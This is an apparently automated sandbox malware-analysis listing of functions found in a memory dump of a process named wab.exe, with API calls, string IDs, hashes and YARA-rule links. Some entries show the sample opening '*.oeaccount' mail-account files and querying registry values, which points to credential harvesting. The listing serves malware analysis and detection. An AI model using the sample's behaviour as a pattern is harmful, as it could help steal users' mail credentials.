                                                                                                                                                                                                                      • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                                                      • API String ID: 2221118986-515162456
                                                                                                                                                                                                                      • Opcode ID: 6b88ecb26755f537598d44b059ba5a346278a106570852c9337f2aed9016ab7b
                                                                                                                                                                                                                      • Instruction ID: 0d9164a1fdbde5ca3cdd745d30cfe3dc8f536e44641e3c26b790e655cd3eaffd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b88ecb26755f537598d44b059ba5a346278a106570852c9337f2aed9016ab7b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71519D31B00525EFEB19DF69D481BEAB7A0FF08304F90016BE815AB251DB79AD51CBC8
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0042F55D Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 143COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: $, $CREATE TABLE
                                                                                                                                                                                                                      • API String ID: 3510742995-3459038510
                                                                                                                                                                                                                      • Opcode ID: 24e9d051a89d5ebfc294a89d8b696b7cb09e4cb3b50fd414110b2fd0402450e3
                                                                                                                                                                                                                      • Instruction ID: 4a0871beed9f250e2dacaf6662beca46c80fe0be2f5bbb48e716de4f7c2f6e71
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 24e9d051a89d5ebfc294a89d8b696b7cb09e4cb3b50fd414110b2fd0402450e3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE51B471E00129AFDF10DF94D4815AFB7F5EF45319FA0806BE401EB202E778DA898B99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00402616 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026D6
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040269F
                                                                                                                                                                                                                        • Part of subcall function 0041025A: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410277
                                                                                                                                                                                                                        • Part of subcall function 0041025A: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410298
                                                                                                                                                                                                                        • Part of subcall function 0041025A: memcpy.MSVCRT ref: 004102D6
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040278E
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 00402798
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1593657333-0
                                                                                                                                                                                                                      • Opcode ID: 16627343bce6d9ca029ba30bb800e57eeae299e547cd663597d7650a0685579b
                                                                                                                                                                                                                      • Instruction ID: a31c39db536bf59591fe237cfeb45fd52263bcc442a3b4586f9b541b98436b80
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16627343bce6d9ca029ba30bb800e57eeae299e547cd663597d7650a0685579b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0741C2B1408394AFEB21CF60CD85AAB77DCAB49304F04493FF588A21D1D6B9DA44CB5A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040C5D8 Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C642
                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C686
                                                                                                                                                                                                                      • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C6A0
                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040C743
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3798638045-0
                                                                                                                                                                                                                      • Opcode ID: 3a7b9920eb43017b966caaa677d6f3b642cf6e436e0306de547793c3a41d1725
                                                                                                                                                                                                                      • Instruction ID: caf6f60f32b19a677c26e4d16bf675fa64e013cae5d841084b333b07d52aaaaa
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a7b9920eb43017b966caaa677d6f3b642cf6e436e0306de547793c3a41d1725
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C41C131500216EBCB35CF24C8C5A96BBA4BF05321F1447B6E958AB2D2C7B99D91CFD8
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040B340 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00409B5A: ??2@YAPAXI@Z.MSVCRT ref: 00409B7B
                                                                                                                                                                                                                        • Part of subcall function 00409B5A: ??3@YAXPAX@Z.MSVCRT ref: 00409C42
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040B366
                                                                                                                                                                                                                      • atoi.MSVCRT ref: 0040B374
                                                                                                                                                                                                                      • _mbsicmp.MSVCRT ref: 0040B3C7
                                                                                                                                                                                                                      • _mbsicmp.MSVCRT ref: 0040B3DA
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4107816708-0
                                                                                                                                                                                                                      • Opcode ID: 8fdabe3cb48b7dd5393ce896bc272b4884b8954cc15d75e5f27a23b60337e2cc
                                                                                                                                                                                                                      • Instruction ID: f56b49caca625ffb6a8305ca332e6707e3f7b6555e2304d22037ac8df505f121
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8fdabe3cb48b7dd5393ce896bc272b4884b8954cc15d75e5f27a23b60337e2cc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC412A75900204EBDB10DF69C581A9DBBF4FB48308F2185BAEC55AB397D738DA41CB98
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00443946 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: strlen
                                                                                                                                                                                                                      • String ID: >$>$>
                                                                                                                                                                                                                      • API String ID: 39653677-3911187716
                                                                                                                                                                                                                      • Opcode ID: 3bef562ec1fa0c496d1df37275b1e68b1d7bde60f2b1f93b6d17329dd08051c1
                                                                                                                                                                                                                      • Instruction ID: c4e2884265c3a68fdd0446f239628287b972743a9c94721f5bed41ec85a51522
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3bef562ec1fa0c496d1df37275b1e68b1d7bde60f2b1f93b6d17329dd08051c1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A313A5184D2C49EFB119F6880457EEFFB14F22706F1886DAC0D167383C2AC9B4AD75A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040CF27 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                      • API String ID: 3510742995-2766056989
                                                                                                                                                                                                                      • Opcode ID: 06b8a3ec594aaba049a721ed4dda8e3acd4ed37df7d7103eefb9391fa1074ca8
                                                                                                                                                                                                                      • Instruction ID: c67b832eded58a7fed5fb718e1005b1d96f95c91eedcc3159726feab918c483c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06b8a3ec594aaba049a721ed4dda8e3acd4ed37df7d7103eefb9391fa1074ca8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB113BF2900705ABCB248F15CCC095A77A9EB94358B00073FFE06562D1E635DA5986DA
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004076FD Relevance: 6.1, APIs: 4, Instructions: 63stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407709
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00407729
                                                                                                                                                                                                                        • Part of subcall function 00406CCE: malloc.MSVCRT ref: 00406CEA
                                                                                                                                                                                                                        • Part of subcall function 00406CCE: memcpy.MSVCRT ref: 00406D02
                                                                                                                                                                                                                        • Part of subcall function 00406CCE: ??3@YAXPAX@Z.MSVCRT ref: 00406D0B
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040774C
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040776C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@$memcpy$mallocstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1171893557-0
                                                                                                                                                                                                                      • Opcode ID: 362879045fdc860860f3123a44022f3e2572d0f7ada27b379acf8bf4c70500ed
                                                                                                                                                                                                                      • Instruction ID: 5e9a081d75c64704428ce8041afbbeb9d52fcced2ab343c8e96fa08cc39daf7c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 362879045fdc860860f3123a44022f3e2572d0f7ada27b379acf8bf4c70500ed
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E411DF71200600DFD730EF18D981D9AB7F5EF443247108A2EF552A7692C736B919CB54
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00407D33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1865533344-0
                                                                                                                                                                                                                      • Opcode ID: 6af0d80cf1f9a4abb6ff5f9bc8d9616050e1b27e252b80ccf982e962f70df596
                                                                                                                                                                                                                      • Instruction ID: e24a5276dafad98c161ef6ad34afde8f808320b1c4234a0015a7989cc473ef50
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6af0d80cf1f9a4abb6ff5f9bc8d9616050e1b27e252b80ccf982e962f70df596
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12118C71608601AFD328CF2DC881A27F7E9FFD8300B20892EE59A87395DA35E801CB15
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00410880 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SHGetMalloc.SHELL32(?), ref: 00410890
                                                                                                                                                                                                                      • SHBrowseForFolder.SHELL32(?), ref: 004108C2
                                                                                                                                                                                                                      • SHGetPathFromIDList.SHELL32(00000000,?), ref: 004108D6
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 004108E9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: BrowseFolderFromListMallocPath_mbscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1479990042-0
                                                                                                                                                                                                                      • Opcode ID: 3753829cb073f40f4471594610d53b7e9f12ad6488aa9b3d51b15237d3a7a1f5
                                                                                                                                                                                                                      • Instruction ID: 22dc721301a1029169844026e50c0f3522bcecfb2be71eae7d1720ca74c813ee
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3753829cb073f40f4471594610d53b7e9f12ad6488aa9b3d51b15237d3a7a1f5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D311FAB5900208AFDB00DFA9D8849EEBBFCFB49314B10406AEA05E7201D774DA45CFA4
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040B65E Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                                                        • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040B684
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B6E7
                                                                                                                                                                                                                        • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                                                                                        • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040B6AE
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040B6C1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 203655857-0
                                                                                                                                                                                                                      • Opcode ID: fd7c26483e5a1075d55b25fd65a92633a23fb1db18fe9454acdb9c540dc78240
                                                                                                                                                                                                                      • Instruction ID: c6c9d64871d24126578c2fffe8df42e6a01bd33b4583c5a66007e13a3507ac6b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd7c26483e5a1075d55b25fd65a92633a23fb1db18fe9454acdb9c540dc78240
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA018BB650030467EB21B775CC86FE773ACAB04304F04047BB656F51D3DA79E9848A6D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040AB21 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040AB44
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040AB5A
                                                                                                                                                                                                                        • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
                                                                                                                                                                                                                        • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040AB84
                                                                                                                                                                                                                        • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                                                        • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                                                      • String ID: </%s>
                                                                                                                                                                                                                      • API String ID: 3699762281-259020660
                                                                                                                                                                                                                      • Opcode ID: aa9275fcc028cffcefa48dde5847177ad6754b943bb00a3c6bf4d2e50bcd3c7a
                                                                                                                                                                                                                      • Instruction ID: 40662a85ba39df66ab9e9dfe1085b05053bd092a42c83a93ebfe6a452f4dfa53
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa9275fcc028cffcefa48dde5847177ad6754b943bb00a3c6bf4d2e50bcd3c7a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F501F9729001296BE720A659DC45FDA776CAF45304F0400FAB60DF3182DB749E548BA5
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0044497B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                      • Opcode ID: 6e69610b48158ddd1cace260c8b8c9f990ff9e3410e7d4f8ed62e5c6a57ef570
                                                                                                                                                                                                                      • Instruction ID: 50686d444a9e23a331db2cec4592ac0caeb7afc27ca0d185df797a95cebddf31
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e69610b48158ddd1cace260c8b8c9f990ff9e3410e7d4f8ed62e5c6a57ef570
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70E0E6A170470196BA24ABBFBD55B1723ECAA84B66314092FB508D72B2DF2CD864D52C
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004021F6 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _ultoasprintf
                                                                                                                                                                                                                      • String ID: %s %s %s
                                                                                                                                                                                                                      • API String ID: 432394123-3850900253
                                                                                                                                                                                                                      • Opcode ID: da56d414bae2e0ef01a77ba25b2d24ae14ce975277d8d1cdc00a6dd34e745ad8
                                                                                                                                                                                                                      • Instruction ID: 4eecb7ebe0e72788cc5a9ba801a24b7f953e3738518a64b6aa949e1543d7b5d3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da56d414bae2e0ef01a77ba25b2d24ae14ce975277d8d1cdc00a6dd34e745ad8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD41C431804A1987D538D5B4878DBEB62A8A702304F5504BFEC9AB32D1D7FCAE45866E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004086A5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,0040EC43,?,00000000,?,?,?,?,?,?), ref: 004086C3
                                                                                                                                                                                                                        • Part of subcall function 00407691: ??3@YAXPAX@Z.MSVCRT ref: 00407698
                                                                                                                                                                                                                        • Part of subcall function 00407691: ??2@YAPAXI@Z.MSVCRT ref: 004076A6
                                                                                                                                                                                                                        • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?), ref: 0040870D
                                                                                                                                                                                                                        • Part of subcall function 0040767C: ??3@YAXPAX@Z.MSVCRT ref: 00407683
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$??3@$??2@CloseCreateHandleReadSize
                                                                                                                                                                                                                      • String ID: C@
                                                                                                                                                                                                                      • API String ID: 1449862175-3201871010
                                                                                                                                                                                                                      • Opcode ID: 05e9bc18889996fc1c644d7848b4516204ab87caed7d052ccf358956a64e1b41
                                                                                                                                                                                                                      • Instruction ID: 7447114fd14c0d02a0ee842544e77a6286768af896f3cc7789f687588c6d710a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 05e9bc18889996fc1c644d7848b4516204ab87caed7d052ccf358956a64e1b41
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88018871C04118AFDB00AF65DC45A8F7FB8DF05364F11C166F855B7191DB349A05CBA5
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00409669 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00409682
                                                                                                                                                                                                                      • SendMessageA.USER32(5\@,00001019,00000000,?), ref: 004096B0
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSendmemset
                                                                                                                                                                                                                      • String ID: 5\@
                                                                                                                                                                                                                      • API String ID: 568519121-3174280609
                                                                                                                                                                                                                      • Opcode ID: ed9ccc659ae768bed3af4396a7a2ef6749329ac2da06921e4e8f3b6130e41676
                                                                                                                                                                                                                      • Instruction ID: d98da3e135da4b1536afdd38015dbf476e5e9df788621b23f2aabad48e216af8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed9ccc659ae768bed3af4396a7a2ef6749329ac2da06921e4e8f3b6130e41676
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F901D679810204EBDB209F85C881EBBB7F8FF84745F10482AE840A6291D3359D95CB79
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00407211 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy
                                                                                                                                                                                                                      • String ID: L$ini
                                                                                                                                                                                                                      • API String ID: 714388716-4234614086
                                                                                                                                                                                                                      • Opcode ID: 40617556e3c7fadddb40d0723bbaf5de75b625f9ab2653ee00342fdf7e802ddb
                                                                                                                                                                                                                      • Instruction ID: f535223de382355a817e33459d0294d4a206ca3c03f6505affaa6c17102478c3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40617556e3c7fadddb40d0723bbaf5de75b625f9ab2653ee00342fdf7e802ddb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE01B2B1D10218AFDF40DFA9D845ADEBBF4BB08348F14812AE515E6240EBB895458F99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0041104F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • failed memory resize %u to %u bytes, xrefs: 00411074
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _msizerealloc
